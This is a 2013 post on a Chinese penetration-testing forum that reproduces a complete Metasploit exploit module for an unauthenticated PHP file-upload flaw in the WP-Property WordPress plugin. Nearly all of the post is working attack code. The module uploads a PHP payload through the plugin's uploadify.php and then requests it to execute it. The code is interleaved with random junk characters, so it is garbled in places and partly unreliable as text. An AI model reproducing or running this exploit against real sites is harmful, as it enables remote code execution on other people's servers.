找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress WP-Property PHP 文件上传漏洞
返回列表 发新帖
查看: 2577|回复: 0
打印 上一主题 下一主题

WordPress WP-Property PHP 文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-4 19:51:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
WordPress WP-Property PHP 文件上传漏洞
' q- P/ \3 V/ c& R0 P. j
$ f+ z+ {5 n/ _ ## # This file is part of the Metasploit Framework and may be subject to
$ o4 t+ q9 y% @6 H2 b' x9 ^1 H  A$ P3 L3 Z! l) F
# redistribution and commercial restrictions. Please see the Metasploit
8 F6 k: }$ }; y( g) O& ~$ U* ?! y6 _/ \' b
# Framework web site for more information on licensing and terms of use.
6 l/ ~+ ?8 P. w) c$ |6 R: ^4 A5 l, k
#   http://metasploit.com/framework/ ##
" }; J4 _! ~5 P" ~9 Z2 q  ^( i9 |7 u/ ^0 S

3 |& e) r; Y( L1 s# J+ ?2 o/ j0 Q7 G9 U+ m9 G

4 j& b! E4 m4 J- l, S3 w# _9 I( u0 a1 h! Q
require 'msf/core'
6 p% P0 m2 t* \! \0 ?( o8 ~  B( `require 'msf/core/exploit/php_exe'( x  i& {/ d' S8 V3 {

/ P9 D! G- O2 i  B* ?/ o! Cclass Metasploit3 < Msf::Exploit::Remote     Rank = ExcellentRanking       include Msf::Exploit::Remote::HttpClient     include Msf::Exploit:hpEXE       def initialize(info = {})         super(update_info(info,             'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',# y* A5 i; j. w
'Description'    => %q{! `- k! m) ~# I  x2 U' u0 }
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress                 plugin. By abusing the uploadify.php file, a malicious user can upload a file to a                 temp directory without authentication, which results in arbitrary code execution.             },             'Author'         =>
/ T; w3 h, F8 D' r) h4 H* n9 R9 ~[
% ?  I0 G: k: Q'Sammy FORGIT', # initial discovery9 o+ e/ ^/ G' G8 L+ b% [5 v
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
! o' i5 W  N9 m1 c: H- F+ }],
- n% ^% Z* W2 x& n, s6 l'License'        => MSF_LICENSE,/ o0 l/ G  |1 S' f7 u* Y* s$ k, _
'References'     =>: T0 J8 T4 B1 H9 k/ I( a
[
9 l. \$ W/ P- ]; v; N6 D/ R[ 'OSVDB', '82656' ],0 U0 k8 \% v: x; s
[ 'BID', '53787' ],
$ G$ y2 g/ N: h[ 'EDB', '18987'],
0 N& e" p+ Q9 l4 Q[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
' B& y8 N) H5 O" U$ N) Y],
# O' I+ x! T  l, X) h9 H4 F'Payload'        =>
' a+ R9 o& B! S5 w{
6 F( s3 f! D( s2 b3 W'BadChars' => "\x00",# l* n( c5 ^: N. D6 U! f
},' G" D+ p& L+ |; O( O
'Platform'       => 'php',
7 a6 l1 ^, n  N'Arch'           => ARCH_PHP,: A& O: H0 m- K2 ~0 O
'Targets'        =>
" e) P0 l5 B) v1 \[3 U7 @$ y  u! ]0 r6 W8 A
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],3 B) N% E' k. N* n6 t0 I0 }
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]0 o! p9 K: n& F9 D
],( c1 ?8 G: p7 _. ?% E, S# J
'DefaultTarget'  => 0,, t+ ]! X! Q& T3 E) ]: _5 f4 W; w
'DisclosureDate' => 'Mar 26 2012')), K6 ^# o/ G1 I4 n4 T! W( p

7 E' Y* t6 j- Z9 M  Uregister_options(% P4 z! N- ]# |% R% S. T
[
( f7 \1 |1 Q' }; q- pOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])9 o7 q$ L' G' G1 P* z- `: }9 O
], self.class)9 R  C" N# J* E1 e
end0 s; Q7 l1 q7 @: v, K/ B
- t' r) J" i2 }. R% c
def check  E0 X' [/ H" @- x  R& t# }! h
uri =  target_uri.path
/ c1 T4 D2 n$ f3 ^+ C: Juri << '/' if uri[-1,1] != '/'           res = send_request_cgi({             'method' => 'GET',
" |& a1 V/ i! F5 P4 c' `4 e, X) Y'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"7 I2 D4 [. W- N% O& a% V
})7 r/ e- t2 p. T3 }/ E
) ?9 [) Z! e& C" F( w
if not res or res.code != 2009 p) F: b5 H3 v% i
return Exploit::CheckCode::Unknown0 }) q$ d3 m- o* }
end
9 H- c& R; O0 l' i4 i* f! l/ k9 l! o0 T
return Exploit::CheckCode::Appears
( G1 C! J/ W5 P6 U; T: X0 [; ~end
2 m3 V' p5 z: f+ c) Q1 q( P
! S+ {# Y( X; sdef exploit
& z! V& M. u& J! B: R5 ^  Ouri =  target_uri.path8 y) ^, r8 G, a& ~: L1 \# A
uri << '/' if uri[-1,1] != '/'           peer = "#{rhost}:#{rport}"           @payload_name = "#{rand_text_alpha(5)}.php"         php_payload = get_write_exec_payload(:unlink_self=>true)
, d% M9 R$ o- ~( e
+ }) z; G: y% o( Q: Qdata = Rex::MIME::Message.new4 C3 K/ }; t# H
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
7 h, f8 {/ k; H1 R1 d9 L& Kdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
8 W# v4 E* c- ]# ?# |post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_'): A: d8 F) S$ y7 a
' d0 H3 g5 ]: d( {* w% I1 h
print_status("#{peer} - Uploading payload #{@payload_name}")
# a; {/ B0 M8 p& [, ~* b7 Cres = send_request_cgi({
' O# z9 N, [! v- \7 X'method' => 'POST',; V' @2 F$ q' n/ e
'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
. T" O4 O/ E: b) M7 v9 A7 g'ctype'  => "multipart/form-data; boundary=#{data.bound}",/ ~! m4 p9 s  ?) V) e
'data'   => post_data8 C4 I/ _) f3 ?) \! ~
})
  g8 S* t/ J0 l- m8 k# R/ C/ ?& G, k5 L' v% e! F
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
" _3 c0 ]& _/ R) L. E4 F+ y$ {fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")) `" N/ f- r6 j" H
end
- j' ]' h+ H* o: g0 c0 `
  u# _7 M' j7 ?) n6 Cupload_uri = res.body
$ l* c! G7 }2 _3 O+ n8 a" ~9 X: g: S, p4 w6 q
print_status("#{peer} - Executing payload #{@payload_name}")
7 B: f8 U6 R" Z9 J% x3 T" cres = send_request_raw({
3 [0 {7 l* D- ^- ]" f. M5 K'uri'    => upload_uri,% l' \5 S2 ]- J4 q3 {
'method' => 'GET'5 F2 i$ n/ D% O& g6 S0 M$ W
})
- ^1 n6 q: t6 d" _& E! D4 A% \! xend, \, a; D' N7 q3 B
end
/ ?7 l/ G& m# H. P, g  f1 y3 n; ]; S- L% k, Y: i/ x  |4 f
不要问我这写的是什么 怎么利用 我是说msf.- u8 I2 p$ K4 ^: a! j
1 `3 w+ E1 N3 O5 d& Z( a
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表